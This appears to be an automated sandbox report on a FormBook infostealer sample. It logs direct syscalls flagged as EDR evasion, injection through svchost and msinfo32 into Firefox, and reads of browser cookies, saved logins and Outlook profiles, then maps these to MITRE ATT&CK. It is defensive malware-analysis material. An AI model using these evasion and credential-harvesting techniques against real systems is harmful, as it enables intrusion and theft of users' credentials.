Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]	1_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]	1_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]	1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]	1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]	1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]	1_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]	1_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]	1_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]	1_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]	1_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]	1_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]	1_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]	1_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]	1_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]	1_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]	1_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]	1_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]	1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]	1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]	1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]	1_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]	1_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]	1_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]	1_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]	1_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	1_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	1_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]	1_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A830 mov eax, dword ptr fs:[00000030h]	1_2_0386A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D483A mov eax, dword ptr fs:[00000030h]	1_2_038D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D483A mov eax, dword ptr fs:[00000030h]	1_2_038D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03842840 mov ecx, dword ptr fs:[00000030h]	1_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03860854 mov eax, dword ptr fs:[00000030h]	1_2_03860854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834859 mov eax, dword ptr fs:[00000030h]	1_2_03834859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834859 mov eax, dword ptr fs:[00000030h]	1_2_03834859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE872 mov eax, dword ptr fs:[00000030h]	1_2_038BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE872 mov eax, dword ptr fs:[00000030h]	1_2_038BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6870 mov eax, dword ptr fs:[00000030h]	1_2_038C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6870 mov eax, dword ptr fs:[00000030h]	1_2_038C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CF80 mov eax, dword ptr fs:[00000030h]	1_2_0386CF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03862F98 mov eax, dword ptr fs:[00000030h]	1_2_03862F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03862F98 mov eax, dword ptr fs:[00000030h]	1_2_03862F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832FC8 mov eax, dword ptr fs:[00000030h]	1_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832FC8 mov eax, dword ptr fs:[00000030h]	1_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832FC8 mov eax, dword ptr fs:[00000030h]	1_2_03832FC8

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_003281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_003281F7

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FA364 SetUnhandledExceptionFilter,		0_2_002FA364
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_002FA395

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: NULL target: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: NULL target: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\msinfo32.exe

Thread register set: target process: 2896

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C4D008

Jump to behavior

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00328C93 LogonUserW,

0_2_00328C93

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_002D3B4C

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_002D4A35

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00334EF5 mouse_event,

0_2_00334EF5

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\6ddrUd6iQo.exe"	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

0_2_003281F7

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00334C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00334C03

Source: 6ddrUd6iQo.exe, 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 6ddrUd6iQo.exe, wEnggOkwNlJAef.exe, 00000005.00000000.1945212530.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000002.3510828480.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: wEnggOkwNlJAef.exe, 00000005.00000000.1945212530.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000002.3510828480.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: wEnggOkwNlJAef.exe, 00000005.00000000.1945212530.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000002.3510828480.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: wEnggOkwNlJAef.exe, 00000005.00000000.1945212530.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000002.3510828480.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002F886B cpuid

0_2_002F886B

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_003050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_003050D7

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00312230 GetUserNameW,

0_2_00312230

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_0030418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0030418A

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002D4AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msinfo32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: 6ddrUd6iQo.exe	Binary or memory string: WIN_81
Source: 6ddrUd6iQo.exe	Binary or memory string: WIN_XP
Source: 6ddrUd6iQo.exe	Binary or memory string: WIN_XPe
Source: 6ddrUd6iQo.exe	Binary or memory string: WIN_VISTA
Source: 6ddrUd6iQo.exe	Binary or memory string: WIN_7
Source: 6ddrUd6iQo.exe	Binary or memory string: WIN_8
Source: 6ddrUd6iQo.exe, 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00346596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00346596
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00346A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00346A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
